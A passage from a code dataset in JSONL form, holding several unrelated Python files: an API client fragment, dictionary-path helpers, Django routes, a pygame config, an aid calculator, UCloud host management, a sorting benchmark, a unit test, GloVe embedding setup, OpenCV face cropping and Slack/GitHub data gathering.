self.query(EntityQuery(id=entity_id))\n try:\n entity = Entity(resp.result['entity_details'][entity_id])\n entity.id = entity_id\n return entity\n except KeyError:\n return None\n\n def get_entities(self, query, limit=20):\n \"\"\"Get a list of matching entities.\n\n Args:\n query: the query\n limit: on return this many matches\n\n Returns:\n An iterator yielding Entities.\n\n Ex:\n >>> api = RawApiClient()\n >>> type(next(api.get_entities({\"type\": \"Company\"}, limit=20)))\n \n \"\"\"\n entities = self.paged_query(EntityQuery(query),\n limit=limit,\n field=\"entity_details\")\n\n for (key, value) in entities:\n entity = Entity(value)\n entity.id = key\n yield entity\n\n def get_status(self, show_statistics=True):\n \"\"\"Find out your token's API usage, broken down by day.\"\"\"\n query = {\"status\": {}}\n if show_statistics:\n query[\"output\"] = {\"statistics\": True}\n resp = self.query(BaseQuery(query))\n return DotAccessDict(resp.result)\n\n def get_metadata(self):\n \"\"\"Get metadata of types and events.\"\"\"\n resp = self.query(BaseQuery(metadata=dict()))\n # pylint: disable=no-member\n return DotAccessDict(resp.result).types\n","sub_path":"rfapi/rawapiclient.py","file_name":"rawapiclient.py","file_ext":"py","file_size_in_byte":12930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306058323","text":"# =============================================================================\n# Authors: PAR Government\n# Organization: DARPA\n#\n# Copyright (c) 2016 PAR Government\n# All rights reserved.\n#==============================================================================\n\nfrom os.path import expanduser\nimport new\nfrom types import MethodType\nimport logging\nfrom threading import RLock\n\nclass Proxy(object):\n def __init__(self, target):\n self._target = target\n\n def __getattr__(self, name):\n target = self._target\n f = getattr(target, name)\n if isinstance(f, MethodType):\n # Rebind the method to the target.\n return new.instancemethod(f.im_func, self, target.__class__)\n else:\n return f\n\ndef removeValue(obj, path):\n\n part = path\n splitpos = path.find(\".\")\n\n if splitpos > 0:\n 
part = path[0:splitpos]\n path = path[splitpos + 1:]\n else:\n path = None\n\n bpos = part.find('[')\n pos = 0\n if bpos > 0:\n pos = int(part[bpos + 1:-1])\n part = part[0:bpos]\n\n if part in obj:\n current_value = obj[part]\n if path is None:\n if type(current_value) is list or type(current_value) is tuple :\n obj[part] = tuple(list(current_value[:pos]) + list(current_value[pos+1:]))\n return current_value[pos]\n else:\n return obj.pop(part)\n else:\n if bpos > 0:\n current_value = current_value[pos]\n return removeValue(current_value,path)\n\n\ndef setPathValue(d, path, value):\n pos = path.find('.')\n lbracket = path.find('[')\n listpos = None\n nextpath = path[pos + 1:] if pos > 0 else None\n if lbracket > 0 and (pos < 0 or lbracket < pos):\n rbracket = path.find(']')\n listpos = int(path[lbracket + 1:rbracket])\n pos = lbracket\n if pos < 0:\n if listpos is not None:\n d[path][listpos] = value\n elif value is None and path in d:\n d.pop(path)\n elif value is not None:\n d[path] = value\n elif listpos is not None:\n setPathValue(d[path[0:pos]][listpos], nextpath, value)\n else:\n if path[0:pos] not in d:\n d[path[0:pos]] = {}\n setPathValue(d[path[0:pos]], nextpath, value)\n\ndef getPathValuesFunc(path):\n from functools import partial\n\n def getValuePath(path, d, **kwargs):\n return getPathValues(d, path)\n\n return partial(getValuePath, path)\n\n\ndef getPathValues(d, path):\n \"\"\"\n Given a nest structure,\n return all the values reference by the given path.\n Always returns a list.\n If the value is not found, the list is empty\n\n NOTE: Processing a list is its own recursion.\n \"\"\"\n pos = path.find('.')\n currentpath = path[0:pos] if pos > 0 else path\n nextpath = path[pos + 1:] if pos > 0 else None\n lbracket = path.find('[')\n itemnum = None\n if lbracket >= 0 and (pos < 0 or lbracket < pos):\n rbracket = path.find(']')\n itemnum = int(path[lbracket + 1:rbracket])\n currentpath = path[0:lbracket]\n # keep the bracket for the next recurive depth\n nextpath = path[lbracket:] if lbracket > 0 else nextpath\n if type(d) is list:\n result = []\n if itemnum is not None:\n result.extend(getPathValues(d[itemnum], nextpath))\n else:\n for item in d:\n # still on the current path node\n result.extend(getPathValues(item, path))\n return result\n if pos < 0:\n if currentpath == '*':\n result = []\n for k, v in d.iteritems():\n result.append(v)\n return result\n return [d[currentpath]] if currentpath in d and d[currentpath] else []\n else:\n if currentpath == '*':\n result = []\n for k, v in d.iteritems():\n result.extend(getPathValues(v, nextpath))\n return result\n return getPathValues(d[currentpath], nextpath) if currentpath in d else []\n\ndef getValue(obj, path, defaultValue=None, convertFunction=None):\n \"\"\"\"Return the value as referenced by the path in the embedded set of dictionaries as referenced by an object\n obj is a node or edge\n path is a dictionary path: a.b.c\n convertFunction converts the value\n\n This function recurses\n \"\"\"\n if obj is None:\n return defaultValue\n if not path:\n return convertFunction(obj) if convertFunction and obj is not None else (defaultValue if obj is None else obj)\n\n current = obj\n part = path\n splitpos = path.find(\".\")\n\n if splitpos > 0:\n part = path[0:splitpos]\n path = path[splitpos + 1:]\n else:\n path = None\n\n bpos = part.find('[')\n pos = 0\n if bpos > 0:\n pos = int(part[bpos + 1:-1])\n part = part[0:bpos]\n\n if part in current:\n current = current[part]\n if type(current) is list or type(current) is tuple:\n if 
bpos > 0:\n current = current[pos]\n else:\n result = []\n for item in current:\n v = getValue(item, path, defaultValue=defaultValue, convertFunction=convertFunction)\n if v is not None:\n result.append(v)\n return result\n return getValue(current, path, defaultValue=defaultValue, convertFunction=convertFunction)\n return defaultValue\n\nclass MaskgenThreadPool:\n\n def __init__(self,size):\n from multiprocessing.pool import ThreadPool\n if size > 1:\n self.thread_pool = ThreadPool(size)\n else:\n self.thread_pool = None\n\n def apply_async(self, func, args=(), kwds={}):\n if self.thread_pool is not None:\n return self.thread_pool.apply_async(func, args=args, kwds=kwds)\n else:\n from multiprocessing.pool import AsyncResult\n result = AsyncResult({},False)\n result._set(0,(True,func(*args, **kwds)))\n return result\n\n\n\nclass ModuleStatus:\n\n def __init__(self,system_name, module_name, component, percentage):\n self.system_name = system_name\n self.module_name = module_name\n self.component = component\n self.percentage = percentage\n\n\nclass StatusTracker:\n def __init__(self, system_name='System', module_name='?', amount=100, status_cb=None):\n self.amount = amount\n self.system_name = system_name\n self.module_name = module_name\n self.current = 0\n self.lock = RLock()\n self.status_cb = status_cb\n self.logger = logging.getLogger('maskgen')\n\n def post(self, module_status):\n \"\"\"\n\n :param module_status:\n :return:\n @type module_status : ModuleStatus\n \"\"\"\n if self.status_cb is None:\n self.logger.info(\n '{} module {} for component {}: {}% Complete'.format(module_status.system_name,\n module_status.module_name,\n module_status.component,\n module_status.percentage))\n else:\n self.status_cb(module_status)\n\n def complete(self):\n self.post(ModuleStatus(self.system_name, self.module_name, 'Complete',100.0))\n\n def next(self,id):\n with self.lock:\n self.post(ModuleStatus(self.system_name, self.module_name, id, (float(self.current)/self.amount)*100.0))\n self.current += 1\n\n","sub_path":"maskgen/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"541510409","text":"from django.urls import path\r\nfrom Users import views\r\n\r\n\r\nurlpatterns = [\r\n path('signup',views.SignUp, name = 'signup'),\r\n path('login',views.Login, name = 'login'),\r\n path('logout',views.logout,name='logout'),\r\n # path('profile',views.profile, name = 'profile'),\r\n \r\n\r\n]\r\n","sub_path":"Voyage_Proj/Users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"163365657","text":"import pygame\nfrom pygame.locals import *\nimport time\ndef variable():\n black = (0, 0, 0)\n rouge = (255,25,0)\n white = (255,255,255)\n depart = int(time.time())\n temps = time.time()\n conteur =int(temps-depart)\n chiffre=str(conteur)\n arial_font = pygame.font.SysFont(\"arial\",30)\n point_vie = 3\n speed =8\n repouser = speed\n aff_crono = arial_font.render(\"Score : \"+chiffre, True, black)\n ips = 60\n hauteur_x = 1100\n hauteur_y= 675\n clock = pygame.time.Clock()\n variable=[black,rouge,white,depart,temps,conteur,chiffre,arial_font,point_vie,speed,repouser,ips,hauteur_x,hauteur_y,aff_crono]\n\n 
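# --- Worked example for the dot-path helpers defined above
# --- (getPathValues / setPathValue); the nested dict is invented:
# >>> doc = {"a": {"b": [{"c": 1}, {"c": 2}]}}
# >>> getPathValues(doc, "a.b.c")
# [1, 2]
# >>> setPathValue(doc, "a.b[1].c", 99)
# >>> getPathValues(doc, "a.b[1].c")
# [99]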
return(variable)\n","sub_path":"Py-Blast/partie_lilian/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"149634657","text":"#******************************************************\r\n#Program Name: extraCredit.py\r\n#Programmer: Gabriela Tolosa Ramirez\r\n#CSC - 119: Fall 2018 - 002\r\n#Date: Oct 22, 2018\r\n#Purpose: Calculate the amount of financial\r\n# assistance for needy families\r\n#Modules used: None\r\n#Input Variable(s): income(float),kids(int)\r\n#Output(s): aid(float)\r\n#******************************************************\r\n\r\n## define if the family can recieve aid based on income and amount of kids\r\n# @parm income indicates the income of the family\r\n# @parm kids indicates the number of kids inthe family\r\n# @return aid indicating the amount of aid the family can/may recieve\r\ndef aidAmount (income,kids):\r\n if income > 30000 and income < 40000 and kids>=3:\r\n aid = \"$1,000 per child\"\r\n return aid\r\n elif income > 20000 and income < 30000 and kids >=2:\r\n aid = \"$1,500 per child\"\r\n return aid\r\n elif income <20000 and kids >= 1:\r\n aid = \"$2,000 per child\"\r\n return aid\r\n else:\r\n aid = \"No aid\"\r\n return aid\r\n\r\ndef main():\r\n cont = 'y'\r\n while cont.lower()==\"y\":\r\n try:\r\n income = float(input(\"What is your family's income? \"))\r\n kids = int(input(\"How many children are in the family? \"))\r\n aid = aidAmount(income,kids)\r\n print(\"The amount of financial assistance that your family may recieve is \\n\" ,aid)\r\n cont = input(\"Do you want to start over?(Y/N) \")\r\n\r\n except Exception as myExc:\r\n print(\"Something went wrong\")\r\n print(\"Maybe one of your values was not a number\")\r\n print(\"The error was:\",myExc)\r\n cont = input(\"Do you want to start over?(Y/N) \")\r\n\r\nmain()\r\ninput()\r\n","sub_path":"Homework/Day 9/extraCredit.py","file_name":"extraCredit.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"248363954","text":"#!/usr/bin/env python\n# vim:set et ts=4 sw=4 fileencoding=utf-8:\n\nfrom base import UcloudBase\nfrom firewall import DescribeSecurityGroup\nimport time\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport re\nimport logging\n\nlogger = logging.getLogger()\nclass CreateCustomImage(UcloudBase):\n pass\n\nclass DescribeImage(UcloudBase):\n def __init__(self, ImageType, ImageId=None, **params):\n params.update(dict(ImageType=ImageType))\n params.update(dict(OsType=\"Linux\"))\n params.update(dict(Limit=100))\n\n self.imageid = ImageId\n if ImageId:\n params.update(dict(ImageId=ImageId))\n\n super(DescribeImage, self).__init__(**params)\n\n def ImageId(self, ImageName):\n for Image in self.res.get(\"ImageSet\"):\n if Image[\"ImageName\"] == ImageName:\n return Image[\"ImageId\"]\n return None\n\n def State(self):\n for Image in self.res.get(\"ImageSet\"):\n if Image[\"ImageId\"] == self.imageid:\n return Image[\"State\"]\n return None\n\n def WaitState(self, hope, step=30, state=\"State\", timeout=120, ignore_timeout=False):\n count=0\n FALG = False\n logger.info(\"WaitImageState: %s\" % hope)\n while True:\n self.request()\n # 镜像的状态\n if state == \"State\":\n if self.State() == hope:\n FALG = True\n\n if FALG:\n logger.info(\"WaitImageState: success\")\n return True\n elif count > timeout:\n if not ignore_timeout:\n raise Exception(\"count: 
%d > timeout: %d\" % (count, timeout))\n break\n else:\n logger.debug(\"count: %d, sleep: %d, timeout: %d\" % (count, step, timeout))\n time.sleep(step)\n count += 1\n return False\n\n\nclass CreateUHostInstance(UcloudBase):\n def __init__(self, Name, ImageId, SecurityGroupId, configs, **params):\n '''\n configs={\n \"Zone\" : zone,\n \"CPU\" : 2,\n \"Memory\" : 4096,\n \"DiskSpace\" : 100,\n \"Password\" : password,\n }\n '''\n default={\n \"LoginMode\" : \"Password\",\n \"StorageType\": \"LocalDisk\",\n \"Quantity\" : 0, # 购买至月末\n \"UHostType\" : \"Normal\",\n }\n\n params.update(default)\n params.update(configs)\n params.update(dict(Name=Name))\n params.update(dict(ImageId=ImageId))\n params.update(dict(SecurityGroupId=SecurityGroupId))\n\n super(CreateUHostInstance, self).__init__(**params)\n\n def IP(self):\n return self.res.get(\"IPs\")\n\n def UHostId(self):\n return self.res.get(\"UHostIds\")[0]\n\nclass AllocateEIP(UcloudBase):\n def __init__(self, Name, ShareBandwidthId=False, **params):\n ''' 默认为独立带宽, 除非带了共享带宽的ID '''\n default = {\n \"OperatorName\" : \"Bgp\",\n \"ChargeType\" : \"Month\",\n \"Quantity\" : 0,\n \"Bandwidth\" : 5,\n \"PayMode\" : \"Bandwidth\",\n }\n\n params.update(default)\n params.update(dict(Name=Name))\n\n if not re.match('cn-', UcloudBase.common.get(\"Region\")):\n params.update(dict(OperatorName=\"International\"))\n\n if ShareBandwidthId:\n params.update(dict(Bandwidth=0))\n params.update(dict(PayMode=\"ShareBandwidth\"))\n params.update(dict(ShareBandwidthId=ShareBandwidthId))\n\n super(AllocateEIP, self).__init__(**params)\n\n def eipaddr(self):\n return self.res.get(\"EIPSet\")[0].get(\"EIPAddr\")[0].get(\"IP\")\n\n def eipid(self):\n return self.res.get(\"EIPSet\")[0].get(\"EIPId\")\n\nclass BindEIP(UcloudBase):\n def __init__(self, EIPId, ResourceId, **params):\n\n params.update(dict(EIPId=EIPId))\n params.update(dict(ResourceId=ResourceId))\n params.update(dict(ResourceType=\"uhost\"))\n\n super(BindEIP, self).__init__(**params)\n\nclass UpdateEIPAttribute(UcloudBase):\n pass\n\nclass DescribeUHostInstance(UcloudBase):\n\n def __init__(self, UHostId=None, **params):\n\n self.hostid = UHostId\n params.update(dict(Limit=9999))\n\n # 不指定 UHostId 将输出所有实例信息\n if UHostId:\n params.update({ \"UHostIds.0\": UHostId})\n\n super(DescribeUHostInstance, self).__init__(**params)\n\n def State(self):\n return self.GetItemByUHostId(self.hostid, \"State\")\n\n def BootDiskState(self):\n return self.GetItemByUHostId(self.hostid, \"BootDiskState\")\n\n def GetIpAddr(self):\n IPSet = self.GetItemByUHostId(self.hostid, \"IPSet\")\n if IPSet:\n for ip in IPSet:\n if \"IPId\" in ip:\n self.eipaddr = ip[\"IP\"]\n self.eipid = ip[\"IPId\"]\n else:\n self.hostip = ip[\"IP\"]\n else:\n raise Exception(\"IPSet error\")\n\n def GetUHostName(self):\n return self.GetItemByUHostId(self.hostid, \"Name\")\n\n def GetItemByUHostId(self, UHostId, Item):\n for Instance in self.res.get(\"UHostSet\"):\n if Instance[\"UHostId\"] == UHostId:\n return Instance[Item]\n return False\n\n def GetUHostIdByItem(self, params):\n for key in params:\n for Instance in self.res.get(\"UHostSet\"):\n if Instance[key] == params[key]:\n return Instance[\"UHostId\"]\n return False\n\n def GetUHostId(self, params):\n self.GetUHostIdByItem(params)\n\n\n def WaitState(self, hope, state=\"State\", timeout=120, step=1, ignore_timeout=False):\n count=0\n FALG = False\n logger.info(\"Wait%s: %s\" % (state, hope))\n while True:\n self.request()\n # 主机实例状态\n if state == \"State\":\n if self.State() == hope:\n FALG 
= True\n # 主机实例的系统盘状态\n elif state == \"BootDiskState\":\n if self.BootDiskState() == hope:\n FALG = True\n\n if FALG:\n logger.info(\"Wait%s: success\" % state)\n return True\n elif count > timeout:\n if not ignore_timeout:\n raise Exception(\"count: %d > timeout: %d\" % (count, timeout))\n break\n else:\n logger.debug(\"count: %d, sleep: %d, timeout: %d\" % (count, step, timeout))\n time.sleep(step)\n count += 1\n return False\n\nclass UHostInstance(UcloudBase):\n\n def __init__(self, UHostId, **params):\n\n self.UHostId = UHostId\n params.update(dict(UHostId=UHostId))\n\n super(UHostInstance, self).__init__(**params)\n\nclass StopUHostInstance(UHostInstance):\n pass\nclass StartUHostInstance(UHostInstance):\n pass\nclass RebootUHostInstance(UHostInstance):\n pass\nclass TerminateUHostInstance(UHostInstance):\n pass\nclass ResizeUHostInstance(UHostInstance):\n pass\n\nclass ModifyUHostInstanceRemark(UcloudBase):\n pass\nclass ModifyUHostInstanceName(UcloudBase):\n pass\n\ndef GetHostIdByRemark(Remark):\n AllInstance = DescribeUHostInstance()\n AllInstance()\n return AllInstance.GetUHostIdByItem(dict(Remark=Remark))\n\ndef GetHostNameById(UHostId):\n AllInstance = DescribeUHostInstance(UHostId)\n AllInstance()\n return AllInstance.GetUHostName()\n\ndef GetIpAddrById(UHostId):\n AllInstance = DescribeUHostInstance(UHostId)\n AllInstance()\n AllInstance.GetIpAddr()\n\n return AllInstance.hostip, AllInstance.eipaddr, AllInstance.eipid\n\ndef GetAllHostsEIP():\n pool = {}\n AllInstance = DescribeUHostInstance()\n AllInstance()\n for Instance in AllInstance.res.get(\"UHostSet\"):\n name = Instance[\"Name\"]\n for ip in Instance.get(\"IPSet\"):\n if \"IPId\" in ip:\n pool[name] = ip[\"IP\"]\n return pool\n\ndef GetAllHostsEIPAndTag():\n pool = {}\n AllInstance = DescribeUHostInstance()\n AllInstance()\n for Instance in AllInstance.res.get(\"UHostSet\"):\n name = Instance[\"Name\"]\n for ip in Instance.get(\"IPSet\"):\n if \"IPId\" in ip:\n pool[name] = { \"ip\": ip[\"IP\"], \"tag\": Instance[\"Tag\"] }\n return pool\n\ndef StartHost(hostid):\n StartUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Running\")\n\ndef StopHost(hostid):\n StopUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Stopped\")\n\ndef RebootHost(hostid):\n # 重启主机( 不用云供应商的reboot方法, 改用冷重启)\n StopUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Stopped\")\n StartUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Running\")\n\ndef TerminateHost(hostid):\n # 删除指定主机(危险: 注意备份)\n StopUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Stopped\")\n TerminateUHostInstance(hostid)()\n\ndef ResizeHost(hostid, params):\n # 调整配置\n ResizeUHostInstance(hostid, **params)()\n\ndef CreateHostImage(hostid, ImageName, Zone):\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Normal\", \"BootDiskState\", 120, 30)\n StopHost(hostid)\n ImageInfo = CreateCustomImage(Zone=Zone, UHostId=hostid, ImageDescription=ImageName, ImageName=ImageName)()\n Image = DescribeImage(\"Custom\", ImageInfo.get(\"ImageId\"))\n Image.WaitState(\"Available\", timeout=60, step=3, ignore_timeout=True)\n StartHost(hostid)\n Image.WaitState(\"Available\", timeout=120, step=3)\n logger.info(\"CreateHostImage: success, ImageID %s\" % Image.imageid)\n\nclass NewHost():\n\n def __init__(self, project_name, ImageName, configs, ShareBandwidthId=False, 
ImageType=\"Base\"):\n\n ImageInfo = DescribeImage(ImageType)\n ImageInfo()\n ImageId = ImageInfo.ImageId(ImageName)\n\n SecurityGroupInfo = DescribeSecurityGroup()\n SecurityGroupInfo()\n GroupId = SecurityGroupInfo.GroupId(project_name.upper())\n\n name = \"Unused\"\n\n Instance = CreateUHostInstance(name, ImageId, GroupId, configs)\n Instance()\n\n self.hostip = Instance.IP()[0]\n self.hostid = Instance.UHostId()\n\n EIP = AllocateEIP(name, ShareBandwidthId)\n EIP()\n\n self.eipaddr = EIP.eipaddr()\n self.eipid = EIP.eipid()\n\n bind = BindEIP( self.eipid, self.hostid )\n bind()\n\n logger.info(\"NewGameServer Info HostID: %s, HostIP: %12s, EIPid: %15s, EIP: %s\"\n % (self.hostid, self.hostip, self.eipid, self.eipaddr))\n\n def SetRemark(self, Remark):\n Ins = ModifyUHostInstanceRemark(Remark=Remark, UHostId=self.hostid)\n Ins()\n eip = UpdateEIPAttribute(Remark=Remark, EIPId=self.eipid)\n eip()\n logger.info(\"SetRemark: %s\" % Remark)\n\n def SetHostName(self, Name):\n Ins = ModifyUHostInstanceName(Name=Name, UHostId=self.hostid)\n Ins()\n eip = UpdateEIPAttribute(Name=Name, EIPId=self.eipid)\n eip()\n logger.info(\"SetHostName: %s\" % Name)\n\n def Start(self):\n StartUHostInstance(self.hostid)()\n\n def Stop(self):\n StopUHostInstance(self.hostid)()\n\n def isRunning(self):\n Ins = DescribeUHostInstance(self.hostid)\n return Ins.WaitState(\"Running\")\n\n def isStopped(self):\n Ins = DescribeUHostInstance(self.hostid)\n return Ins.WaitState(\"Stopped\")\n","sub_path":"FusionCli-original/backend/ucloud/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":11660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"565961059","text":"import matplotlib as mpl\nfrom random import randint\nimport timeit\n\n\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\ndef desenhaGrafico(x,y, nome, xl = \"Entradas\", yl = \"Saídas\"):\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(111)\n ax.plot(x,y, label = \"Melhor Tempo\")\n ax.legend(bbox_to_anchor=(1, 1),bbox_transform=plt.gcf().transFigure)\n plt.ylabel(yl)\n plt.xlabel(xl)\n fig.savefig('nome.png')\nOP=[]\ndef bubble_sort(lista):\n elementos = len(lista)-1\n ordenado = False\n aux=0\n while not ordenado:\n ordenado = True\n for i in range(elementos):\n if lista[i] > lista[i+1]:\n lista[i], lista[i+1] = lista[i+1],lista[i]\n ordenado = False \n aux+=1; \n OP.append(aux) \n return lista\n\ndef geraLista(tam):\n lista = []\n while len(lista) < tam:\n n = randint(1,1*tam)\n if n not in lista: lista.append(n)\n return lista\n\ntempo=[]\nlist=[10000,20000,50000,100000]\nfor i in list:\n\n lista=geraLista(i)\n \n tempo.append(timeit.timeit(\"bubble_sort({})\".format(lista),setup=\"from __main__ import bubble_sort\",number=1))\n print(i)\n\ndesenhaGrafico(list,tempo,'bolha_tempo')\ndesenhaGrafico(list,OP,'bolha_operação')\n","sub_path":"bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"533736525","text":"from unittest.mock import MagicMock\nfrom unittest.mock import sentinel\n\nfrom pytest import fixture\nfrom pytest import raises\n\nfrom sapp.configurator import Configurator\nfrom sapp.configurator import ConfiguratorNotStartedError\nfrom sapp.context_manager import ContextManager\nfrom sapp.plugin import Plugin\n\n\nclass ExamplePlugin(Plugin):\n def enter(self, context):\n context.example = sentinel.example\n\n\nclass 
ExampleConfigurator(Configurator):\n    def append_plugins(self):\n        super().append_plugins()\n        self.plugin1 = MagicMock()\n        self.plugin2 = MagicMock()\n        self.plugin3 = ExamplePlugin()\n\n        self.add_plugin(self.plugin1)\n        self.add_plugin(self.plugin2)\n        self.add_plugin(self.plugin3)\n\n\nclass TestConfigurator(object):\n    @fixture\n    def configurator(self):\n        return ExampleConfigurator()\n\n    def test_start(self, configurator):\n        \"\"\"\n        .start should append plugins and init them. Also proper flags should be\n        set.\n        \"\"\"\n        configurator.start(\"wsgi\", wsgi=1)\n\n        assert configurator.extra == {\"wsgi\": 1}\n        assert configurator.startpoint == \"wsgi\"\n        assert configurator.is_started\n\n        configurator.plugin1.start.assert_called_once_with(configurator)\n        configurator.plugin2.start.assert_called_once_with(configurator)\n\n        assert configurator.plugins == [\n            configurator.plugin1,\n            configurator.plugin2,\n            configurator.plugin3,\n        ]\n","sub_path":"sapp/tests/test_configurator.py","file_name":"test_configurator.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"579944639","text":"import numpy as np\nimport os\n\nfrom tqdm import tqdm\n\nword_counts_threshold=10\nword_counts = {}\nnsents = 0\n# Walk the caption corpus and count word frequencies\nfor sent in all_train_captions:\n    nsents+=1\n    for w in sent.split(\" \"):\n        word_counts[w] = word_counts.get(w,0)+1\n\nvocab = [w for w in word_counts if word_counts[w]>=word_counts_threshold]\n\nprint('preprocessed words %d ==> %d' % (len(word_counts), len(vocab)))\n\nidxtoword={}\nwordtoidx={}\nix =1\n\nfor w in vocab:\n    idxtoword[ix] = w\n    wordtoidx[w] = ix\n\n    ix+=1\nvocab_size = len(idxtoword)+1\nprint(vocab_size)\nembeddings_index = {}\n\nwith open(os.path.join(root_path,\"glove.6B.200d.txt\"),encoding=\"UTF-8\") as f:\n    for line in tqdm(f):\n        values = line.split()\n        word = values[0]\n\n        coefs = np.asarray(values[1:],dtype=\"float32\")\n\n        embeddings_index[word] = coefs\n\nprint(f'Found {len(embeddings_index)} word vectors.')\n\nemb_dim =200\n\nembeddings_matrix = np.zeros((vocab_size,emb_dim))\n\n# wordtoidx maps word -> index, so unpack items() as (word, i)\nfor word, i in wordtoidx.items():\n    emb_vector = embeddings_index.get(word)\n    if emb_vector is not None:\n        embeddings_matrix[i] = emb_vector\n","sub_path":"preprocess/emb.py","file_name":"emb.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"540907560","text":"import cv2\n\n# the cascade files live under Anaconda3\\\Library\\\etc\\\haarcascades\n# a long way off, hence ../../\n\n# 潮顔 綾の号\n# \n\n# for face detection\nface_cascade_path = './library/haarcascade_frontalface_default.xml'\n\n#face_cascade_path = './library/haarcascade_profileface.xml'\n# for eye detection\neye_cascade_path = './library/haarcascade_eye.xml'\n\nface_cascade = cv2.CascadeClassifier(face_cascade_path)\n\ncount = 0\n\nfor i in range(1, 81):\n    src = cv2.imread('./data/yosuke/sample ('+str(i)+').jpg')\n\n    # show for a quick test\n    # cv2.imshow(\"loaded\", src)\n    # wait for a keypress\n    # cv2.waitKey(0)\n\n    src_gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n\n    faces = face_cascade.detectMultiScale(src_gray)\n\n    # detectMultiScale returns the x,y position plus the width and height of each detected face\n    # rectangle: top-left corner coords, bottom-right corner coords, color, border width\n    '''\n    for x, y, w, h in faces:\n        cv2.rectangle(src, (x, y), (x + w, y + h), (255, 0, 0), 2)\n        face = src[y: y + h, x: x + w]\n        face_gray = src_gray[y: y + h, x: x + w]\n    to detect eyes as well:\n    eyes = eye_cascade.detectMultiScale(face_gray)\n    for (ex, ey, ew, eh) in eyes:\n        cv2.rectangle(face, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2) \n    '''\n\n    # 
cv2.imwrite('data/opencv_face_detect_rectangle.jpg', src)\n # print(faces)\n\n # 切り出し\n for rect in faces:\n count += 1\n #cv2.imwrite('demo.jpg', image[rect])\n x = rect[0]\n y = rect[1]\n w = rect[2]\n h = rect[3]\n \n # img[y: y + h, x: x + w] \n cv2.imwrite('./redata/koyanagi_' + str(i+1+count) + '.png', src[y:y+h, x:x+w])","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"489291298","text":"from organization_github.organizations import Organizations\nfrom pathlib import Path\nfrom organization_github.repositories import Repositories\nfrom associations.associations import Associations\nfrom slack.element_slack.channels import Channels\nfrom slack.element_slack.users import Users\nfrom slack.urlmessagesslack import UrlMessagesSlack\nfrom slack.workspace.workspace_slackarchive import WorkspacesSlackArchive\nfrom slack.workspace.workspaces_csv import WorkspacesCSV\nfrom slack.workspace.workspaces_raw import WorkspacesRaw\nimport csv\nimport threading\nimport os\n\n\nclass Containers:\n\n def __init__(self, ):\n self._associations: list = list()\n\n def add_association(self, name_organization, path, tokens):\n directory = 'issue&pull ' + name_organization\n organization: Organizations = Organizations(directory, name_organization, tokens)\n organization.get_scv_repositories()\n organization.get_first_filter()\n organization.get_second_filter()\n organization.get_third_filter()\n organization.get_fourth_filter()\n organization.get_fifth_filter()\n organization.get_sixth_filter()\n p = Path(path)\n workspace = None\n if p.is_file() and p.suffix == \".csv\":\n workspace = WorkspacesCSV(path)\n else:\n try:\n workspace = WorkspacesSlackArchive(path, name_organization)\n except FileNotFoundError:\n workspace = WorkspacesRaw(path, name_organization)\n if workspace is not None:\n workspace.get_csv_channel_organization()\n for name_channel in workspace.get_names_channel():\n if organization.contain_association(name_channel):\n repositories = organization.get_association(name_channel)\n workspace.get_channel(name_channel)\n for repository in repositories:\n association: Associations = Associations(directory, repository,\n workspace.get_channel(name_channel),\n name_organization, organization.get_name_file_issue(),\n organization.get_name_file_comments_issue(),\n organization.get_name_file_pull_request(),\n organization.get_name_file_comments_pull_request())\n self._associations.append(association)\n\n def messages_for_channel(self):\n for association in self._associations:\n channel: Channels = association.get_channel()\n file = open(\n \"messages for channel \" + channel.get_name_channel() + \" of \" +\n association.get_name_organization() + \".csv\",\n \"wt\")\n try:\n writer: csv.DictWriter = csv.writer(file, quoting=csv.QUOTE_NONNUMERIC)\n writer.writerow((\"Workspace\", \"Channel\", \"Id\", \"Sender\", \"text\", \"time\", \"mention\"))\n name_workspace = association.get_name_organization()\n senders = channel.get_users()\n for key in senders:\n sender: Users = senders.get(key)\n messages = sender.show_messages()\n if messages is not None and len(messages) != 0:\n for message in messages:\n mentions: str = \"\"\n for mention in message.get_mentions():\n mentions = mentions + \", \" + str(mention)\n writer.writerow((name_workspace, channel.get_name_channel(), sender.get_id_user(),\n sender.get_name_user(), message.get_message(),\n 
